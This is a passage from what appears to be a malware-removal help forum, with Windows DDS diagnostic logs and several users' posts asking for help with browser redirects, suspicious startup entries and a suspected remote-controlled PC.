C:\Windows\system32\SearchFilterHost.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uSearch Bar = Preserve
mWinlogon: Userinit = userinit.exe,
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
uRun: [WMPNSCFG] C:\Program Files (x86)\Windows Media Player\WMPNSCFG.exe
mRun: [CTxfiHlp] CTXFIHLP.EXE
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [CanonSolutionMenuEx] "C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE" /logon
mRun: [AsioThk32Reg] REGSVR32.EXE /S CTASIO.DLL
mRun: [CTHelper] CTHELPER.EXE
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
dRun: [DevconDefaultDB] C:\Windows\System32\READREG /SILENT /FAIL=1
dRun: [ZoneAlarm Windows 10 Upgrader] "C:\ProgramData\CheckPoint\ZoneAlarm\Data\Updates\unpacked==win10=update_win10.zip\upgrade.exe" /delay
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: SoftwareSASGeneration = dword:1
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
.
INFO: HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{9FBE1644-D6A2-4D7F-8F37-1FF16088AAC4} : DHCPNameServer = 192.168.1.254
TCP: Interfaces\{D0F0DAD0-C795-47B6-8324-59C767D47CD1} : DHCPNameServer = 172.20.10.1
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.155\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-Run: [Windows Defender] C:\Program Files (x86)\Windows Defender\MSASCui.exe -hide
x64-Run: [CanonMyPrinter] C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
x64-mPolicies-Explorer: NoActiveDesktop = dword:1
x64-mPolicies-Explorer: NoActiveDesktopChanges = dword:1
x64-mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-mPolicies-System: SoftwareSASGeneration = dword:1
.
INFO: x64-HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
Hosts: 127.0.0.1 Spyware Info | Spyware Info
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\rqaa93y2.default-1388514397121\
FF - plugin: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.28.1\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Veetle\Player\npvlc.dll
FF - plugin: C:\Program Files (x86)\Veetle\plugins\npVeetle.dll
FF - plugin: C:\Program Files (x86)\Veetle\VLCBroadcast\npvbp.dll
.
============= SERVICES / DRIVERS ===============
.
R0 aswVmm;avast! VM Monitor;C:\Windows\System32\drivers\aswVmm.sys [2015-8-31 274808]
R1 aswSnx;aswSnx;C:\Windows\System32\drivers\aswsnx.sys [2015-8-31 1048344]
R1 aswSP;aswSP;C:\Windows\System32\drivers\aswSP.sys [2015-8-31 447944]
R2 aswHwid;avast! HardwareID;C:\Windows\System32\drivers\aswHwid.sys [2015-8-31 28656]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2015-8-31 90968]
R2 avast! Antivirus;Avast Antivirus;C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2015-8-31 146600]
R2 FontCache;Windows Font Cache Service;C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation [2009-8-30 27648]
R2 SBSDWSCService;SBSD Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe [2010-5-29 1153368]
R3 aswStmXP;Avast StreamFilter Driver;C:\Windows\System32\drivers\aswStmXP.sys [2015-8-31 210936]
R3 COMMONFX.SYS;COMMONFX.SYS;C:\Windows\System32\drivers\COMMONFX.sys [2009-6-23 158744]
R3 CTAUDFX.SYS;CTAUDFX.SYS;C:\Windows\System32\drivers\CTAUDFX.sys [2009-6-23 706584]
R3 CTSBLFX.SYS;CTSBLFX.SYS;C:\Windows\System32\drivers\CTSBLFX.sys [2009-6-23 680984]
S0 aswRvrt;avast! Revert;C:\Windows\System32\drivers\aswRvrt.sys [2015-8-31 65224]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S3 c65013264;C-Media CM6501 Like Sound UDAX Interface;C:\Windows\System32\drivers\c6501.sys [2009-8-27 1095168]
S3 COMMONFX;COMMONFX;C:\Windows\System32\drivers\COMMONFX.sys [2009-6-23 158744]
S3 Creative Audio Engine Licensing Service;Creative Audio Engine Licensing Service;C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [2009-8-28 79360]
S3 CTAUDFX;CTAUDFX;C:\Windows\System32\drivers\CTAUDFX.sys [2009-6-23 706584]
S3 CTERFXFX.SYS;CTERFXFX.SYS;C:\Windows\System32\drivers\CTERFXFX.sys [2009-6-23 141848]
S3 CTERFXFX;CTERFXFX;C:\Windows\System32\drivers\CTERFXFX.sys [2009-6-23 141848]
S3 CTSBLFX;CTSBLFX;C:\Windows\System32\drivers\CTSBLFX.sys [2009-6-23 680984]
S3 Netaapl;Apple Mobile Device Ethernet Service;C:\Windows\System32\drivers\netaapl64.sys [2013-7-25 23040]
S3 PerfHost;Performance Counter DLL Host;C:\Windows\SysWOW64\perfhost.exe [2009-8-30 19968]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2014-8-16 54784]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\WPFFontCache_v0400.exe [2013-9-11 1012344]
S4 clr_optimization_v2.0.50727_64;Microsoft .NET Framework NGEN v2.0.50727_X64;C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [2014-8-13 90776]
SUnknown snoanxmw;snoanxmw; [x]
.
=============== File Associations ===============
.
FileExt: .js: JSFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M ====================
.
2015-08-31 16:07:38 1048344 ----a-w- C:\Windows\System32\drivers\aswsnx.sys
2015-08-31 16:05:32 65224 ----a-w- C:\Windows\System32\drivers\aswTdi.sys
2015-08-31 16:05:32 210936 ----a-w- C:\Windows\System32\drivers\aswStmXP.sys
2015-08-31 16:05:30 274808 ----a-w- C:\Windows\System32\drivers\aswVmm.sys
2015-08-31 16:05:29 90968 ----a-w- C:\Windows\System32\drivers\aswMonFlt.sys
2015-08-31 16:05:29 65224 ----a-w- C:\Windows\System32\drivers\aswRvrt.sys
2015-08-31 16:05:29 447944 ----a-w- C:\Windows\System32\drivers\aswSP.sys
2015-08-31 16:05:29 378880 ----a-w- C:\Windows\System32\aswBoot.exe
2015-08-31 16:05:29 28656 ----a-w- C:\Windows\System32\drivers\aswHwid.sys
2015-08-31 16:05:28 64712 ----a-w- C:\Windows\System32\drivers\aswRdr.sys
2015-08-31 16:03:47 43112 ----a-w- C:\Windows\avastSS.scr
2015-08-04 23:03:08 877152 ----a-w- C:\Windows\SysWow64\msvcr120_clr0400.dll
2015-08-04 23:03:08 538208 ----a-w- C:\Windows\SysWow64\msvcp120_clr0400.dll
2015-08-04 22:53:26 872528 ----a-w- C:\Windows\System32\msvcr120_clr0400.dll
2015-08-04 22:53:26 681552 ----a-w- C:\Windows\System32\msvcp120_clr0400.dll
2015-07-31 22:31:08 48128 ----a-w- C:\Windows\System32\atmlib.dll
2015-07-31 22:08:07 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2015-07-31 21:46:51 219648 ----a-w- C:\Windows\SysWow64\d3d10_1core.dll
2015-07-31 21:46:51 189952 ----a-w- C:\Windows\SysWow64\d3d10core.dll
2015-07-31 21:46:51 160768 ----a-w- C:\Windows\SysWow64\d3d10_1.dll
2015-07-31 21:46:51 1029120 ----a-w- C:\Windows\SysWow64\d3d10.dll
2015-07-31 21:44:47 287232 ----a-w- C:\Windows\System32\d3d10core.dll
2015-07-31 21:44:46 327680 ----a-w- C:\Windows\System32\d3d10_1core.dll
2015-07-31 21:44:46 196096 ----a-w- C:\Windows\System32\d3d10_1.dll
2015-07-31 21:44:46 1268224 ----a-w- C:\Windows\System32\d3d10.dll
2015-07-31 21:26:53 2796032 ----a-w- C:\Windows\System32\win32k.sys
2015-07-31 21:25:35 372736 ----a-w- C:\Windows\System32\atmfd.dll
2015-07-31 21:10:54 2002944 ----a-w- C:\Windows\System32\d3d10warp.dll
2015-07-31 21:09:43 566272 ----a-w- C:\Windows\System32\d3d10level9.dll
2015-07-31 21:00:29 834048 ----a-w- C:\Windows\System32\d2d1.dll
2015-07-31 20:59:16 1561088 ----a-w- C:\Windows\System32\DWrite.dll
2015-07-31 20:59:07 1154560 ----a-w- C:\Windows\System32\FntCache.dll
2015-07-31 20:41:22 1172480 ----a-w- C:\Windows\SysWow64\d3d10warp.dll
2015-07-31 20:40:42 486400 ----a-w- C:\Windows\SysWow64\d3d10level9.dll
2015-07-31 20:35:10 682496 ----a-w- C:\Windows\SysWow64\d2d1.dll
2015-07-31 20:33:57 1072640 ----a-w- C:\Windows\SysWow64\DWrite.dll
2015-07-31 20:33:04 297472 ----a-w- C:\Windows\SysWow64\atmfd.dll
2015-07-31 20:03:52 124624 ----a-w- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
2015-07-31 19:27:52 103120 ----a-w- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-07-28 09:59:08 132483416 ----a-w- C:\Windows\System32\mrt.exe
2015-07-22 22:08:45 17889792 ----a-w- C:\Windows\System32\mshtml.dll
2015-07-22 21:59:09 448512 ----a-w- C:\Windows\System32\html.iec
2015-07-22 21:56:02 2344448 ----a-w- C:\Windows\System32\jscript9.dll
2015-07-22 21:55:11 10936832 ----a-w- C:\Windows\System32\ieframe.dll
2015-07-22 21:50:54 1387520 ----a-w- C:\Windows\System32\urlmon.dll
2015-07-22 21:50:18 1392128 ----a-w- C:\Windows\System32\wininet.dll
2015-07-22 21:49:21 2158080 ----a-w- C:\Windows\System32\iertutil.dll
2015-07-22 21:49:10 1494016 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-07-22 21:48:52 237056 ----a-w- C:\Windows\System32\url.dll
2015-07-22 21:48:43 86016 ----a-w- C:\Windows\System32\jsproxy.dll
2015-07-22 21:48:23 173568 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-07-22 21:48:18 599040 ----a-w- C:\Windows\System32\vbscript.dll
2015-07-22 21:48:17 816640 ----a-w- C:\Windows\System32\jscript.dll
2015-07-22 21:48:07 729088 ----a-w- C:\Windows\System32\msfeeds.dll
2015-07-22 21:47:40 453120 ----a-w- C:\Windows\System32\dxtmsft.dll
2015-07-22 21:47:36 282112 ----a-w- C:\Windows\System32\dxtrans.dll
2015-07-22 21:47:32 55296 ----a-w- C:\Windows\System32\msfeedsbs.dll
2015-07-22 21:47:26 11264 ----a-w- C:\Windows\System32\msfeedssync.exe
2015-07-22 21:47:22 96768 ----a-w- C:\Windows\System32\mshtmled.dll
2015-07-22 21:47:12 2382848 ----a-w- C:\Windows\System32\mshtml.tlb
2015-07-22 21:47:03 12800 ----a-w- C:\Windows\System32\mshta.exe
2015-07-22 21:46:51 248320 ----a-w- C:\Windows\System32\ieui.dll
2015-07-22 20:54:48 367616 ----a-w- C:\Windows\SysWow64\html.iec
2015-07-22 20:54:00 12386816 ----a-w- C:\Windows\SysWow64\mshtml.dll
2015-07-22 20:51:20 1810432 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-07-22 20:47:59 9751040 ----a-w- C:\Windows\SysWow64\ieframe.dll
2015-07-22 20:46:44 1139712 ----a-w- C:\Windows\SysWow64\urlmon.dll
2015-07-22 20:46:19 1129472 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-07-22 20:45:50 1427968 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-07-22 20:45:16 231936 ----a-w- C:\Windows\SysWow64\url.dll
2015-07-22 20:45:05 65536 ----a-w- C:\Windows\SysWow64\jsproxy.dll
2015-07-22 20:44:56 142848 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-07-22 20:44:39 421888 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-07-22 20:44:22 718336 ----a-w- C:\Windows\SysWow64\jscript.dll
2015-07-22 20:44:18 1804288 ----a-w- C:\Windows\SysWow64\iertutil.dll
2015-07-22 20:44:16 607744 ----a-w- C:\Windows\SysWow64\msfeeds.dll
2015-07-22 20:43:58 41472 ----a-w- C:\Windows\SysWow64\msfeedsbs.dll
2015-07-22 20:43:58 353792 ----a-w- C:\Windows\SysWow64\dxtmsft.dll
2015-07-22 20:43:47 223232 ----a-w- C:\Windows\SysWow64\dxtrans.dll
2015-07-22 20:43:37 10752 ----a-w- C:\Windows\SysWow64\msfeedssync.exe
2015-07-22 20:43:30 73216 ----a-w- C:\Windows\SysWow64\mshtmled.dll
2015-07-22 20:43:20 2382848 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-07-22 20:43:19 11776 ----a-w- C:\Windows\SysWow64\mshta.exe
2015-07-22 20:42:40 176640 ----a-w- C:\Windows\SysWow64\ieui.dll
2015-07-21 20:59:25 1586304 ----a-w- C:\Windows\System32\ntdll.dll
2015-07-21 20:59:25 1168600 ----a-w- C:\Windows\SysWow64\ntdll.dll
2015-07-21 15:50:53 68544 ----a-w- C:\Windows\System32\drivers\mountmgr.sys
2015-07-21 15:50:53 4690880 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-07-21 15:50:52 154048 ----a-w- C:\Windows\System32\drivers\ecache.sys
2015-07-21 15:41:14 11264 ----a-w- C:\Windows\System32\msmmsp.dll
2015-07-21 15:40:45 399360 ----a-w- C:\Windows\System32\emdmgmt.dll
2015-07-21 15:40:37 85504 ----a-w- C:\Windows\System32\csrsrv.dll
2015-07-18 15:41:47 80384 ----a-w- C:\Windows\System32\basesrv.dll
2015-07-11 17:13:15 12901888 ----a-w- C:\Windows\System32\shell32.dll
2015-07-11 15:56:09 11587584 ----a-w- C:\Windows\SysWow64\shell32.dll
2015-07-10 19:37:10 1402368 ----a-w- C:\Windows\SysWow64\msxml6.dll
2015-07-10 19:37:10 1253376 ----a-w- C:\Windows\SysWow64\msxml3.dll
2015-07-10 19:37:09 2067968 ----a-w- C:\Windows\SysWow64\mstscax.dll
2015-07-10 19:35:34 1875968 ----a-w- C:\Windows\System32\msxml3.dll
2015-07-10 19:35:34 1796096 ----a-w- C:\Windows\System32\msxml6.dll
.
============= FINISH: 18:03:53.45 ===============

Attached Files
File Type: txt attach.txt (4.5 KB)

Constant browser pop-ups (ad-type.google.com)

Hello!

We've had some issues with browser pop-ups in our house for a few months, and we weren't able to figure out what the issue was. This affects every laptop and Android device in the house, though not constantly.

The issue is that, every once in a while when we click on a link or open a new tab/page, there is a browser redirect (on Android) or popup (laptops) to the following address:
http://ad-type.google.com/sh.aspx?f=...d1b83443fbc54d
This then directs to http://www.tradeadexchange.com/ and then to some scary-looking page full of warnings of outdated Java or something and links which nobody is stupid enough to click on, thankfully.
E.g.
http://www.tradeadexchange.com/a/dis...28611445186973
(This is a warning page)Warning!

Lots of internet help pages we originally looked at indicated that it might be a router issue, but a total reset hasn't fixed the problem for more than a few minutes.

Any help would be greatly appreciated. I purchased a brand new laptop today and would like to actually enjoy using it...

Thanks so much!! :smile:

Possible malware (Uncertain)

Hello all

In an attempt to make my laptop faster on startup, I went into Norton's Performance section and reviewed all programs launching on startup. Something strange I noticed is this
screenshot on imgur

"Windows Command Processor" is mentioned 3 times here. It is not mentioned when reviewing startup programs with Task Manager. On top of that, I cannot disable them as they re-enable themselves when I try to, while others can be disabled.

This "issue" is only present on my laptop and not on my PC, which uses the same anti virus and a lot of the same programs.

Full system scan with Norton and Malwarebytes did not bring up anything, so I'm not even sure if it's malware/spyware. Better to be safe than sorry though. I have no clue why it's mentioned 3 times and why it cannot be disabled. Apparently keyloggers work this way, although I am no expert on the subject so feel free to correct me.

Any input is very appreciated. OS is Windows 10, laptop is an Acer Aspire V3 -722G.

Thanks in advance

Hello I believe I need some guidance...

I just reinstalled Windows 7 because of many problems that I was encountering; no matter what I tried to do to fix them, nothing ever worked. I came across your site while trying to troubleshoot why my cmd.exe would not stay open, still, after a fresh install of Windows. I have suspected my PC has been remotely controlled for some time now but could never figure it out exactly enough to logically explain this to someone. I would really appreciate it if someone could shed some light on this situation for me. I attached the files for review.

Thanks in advance,

Brooke :ermm:

Attached Files
File Type: txt dds.txt (19.5 KB)
File Type: txt attach.txt (4.8 KB)

Problems With System Restore In Vista

System Restore is no longer creating automatic restore points and is not retaining manually created points.
It also shows a Runtime error message, and that message seems to cause the Microsoft Help and Support pop-up message to crash.
This also happens on opening Safe Mode.
I had posted this in the Vista forums but SpywareDr thought that there might be spyware or Malware involved and suggested checking this out.
I have run extensive antivirus checks but all have come up clean.

Problem with Google.com

Dear Sirs

I recently opened an email from BrianandSally. Brian and Sally are my stepbrother's daughter & her husband.

After opening the email I have found that Google keeps locking, and the only way to get out of it is to open Task Master and Close Down Google.

Could you help please?

Jack Willday

Windows Command Processor x3 in startup

Hello

In an attempt to make my laptop faster on startup, I went into Norton's Performance section and reviewed all programs launching on startup. Something strange I noticed is "Windows Command Processor". It is mentioned 3 times in Norton's startup review. It is not mentioned when reviewing startup programs with Task Manager. On top of that, I cannot disable them as they re-enable themselves when I try to, while others can be disabled.

This "issue" is only present on my laptop and not on my PC, which uses the same anti virus and a lot of the same programs.

Full system scan with Norton and Malwarebytes did not bring up anything, so I'm not even sure if it's malware/spyware. Better to be safe than sorry though. I have no clue why it's mentioned 3 times and why it cannot be disabled. Apparently keyloggers work this way, although I am no expert on the subject so feel free to correct me.

Any input is very appreciated. OS is Windows 10, laptop is an Acer Aspire V3 -722G.


I ran the dds.scr.

Attach.txt should be included with this post, and the logs are posted below.

Although it is a legit copy of Windows 10 - upgraded from 8.1 - I do not have access to a Windows disc; however, a factory reset is possible if it happens to be a serious threat and cannot be removed otherwise. I'd like to keep that as a last resort, however.

Thank you for your time and expertise and I await further instructions.
Logs:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.10240.16412 BrowserJavaVersion: 11.40.2
Run by philippe at 14:56:42 on 2015-09-23
Microsoft Windows 10 Home 10.0.10240.0.1252.44.1043.18.8072.4770 [GMT 2:00]
.
AV: Norton Internet Security *Enabled/Updated* {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Norton Internet Security *Enabled/Updated* {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Internet Security *Enabled* {6BFC5632-188D-B806-D13E-C607121B42A0}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\WINDOWS\system32\nvvsvc.exe
C:\Windows\System32\WUDFHost.exe
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\system32\dashost.exe
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe
C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\Bin\IpOverUsbSvc.exe
C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe
C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe
C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Norton Anti-Theft\Engine\1.10.0.9\NAT.exe
C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\NIS.exe
C:\Program Files\MySQL\MySQL Server 5.6\bin\mysqld.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe
C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
svchost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
c:\Program Files (x86)\Nero\Update\NASvc.exe
C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe
C:\WINDOWS\system32\taskeng.exe
C:\WINDOWS\System32\dwm.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\WINDOWS\system32\nvvsvc.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files (x86)\Norton Online Backup ARA\Engine\4.3.0.14\Ara.exe
C:\WINDOWS\system32\CompatTelRunner.exe
C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16464_none_116100d161f6ab1d\TiWorker.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\system32\igfxEM.exe
C:\WINDOWS\system32\igfxHK.exe
C:\WINDOWS\system32\igfxTray.exe
C:\WINDOWS\Explorer.EXE
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\NIS.exe
C:\Program Files (x86)\Norton Anti-Theft\Engine\1.10.0.9\NAT.exe
C:\Windows\System32\RuntimeBroker.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Dolby PCEE4\pcee4.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files\Acer\Acer Launch Manager\LMEvent.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\Program Files\Acer\Acer Launch Manager\LMTray.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
C:\Users\philippe\AppData\Local\FluxSoftware\Flux\flux.exe
C:\Program Files\SteelSeries\SteelSeries Engine 3\SteelSeriesEngine3.exe
C:\Users\philippe\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\acrotray.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\SysWOW64\cmd.exe
C:\WINDOWS\SysWOW64\cmd.exe
C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\conathst.exe
C:\Program Files (x86)\McAfee\SiteAdvisor\McChHost.exe
C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\nacl64.exe
C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\nacl64.exe
C:\WINDOWS\sysWOW64\wbem\wmiprvse.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\igfxext.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe
C:\WINDOWS\system32\backgroundTaskHost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Windows\System32\InstallAgent.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://acer13.msn.com
uDefault_Page_URL = hxxp://acer13.msn.com
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\coieplg.dll
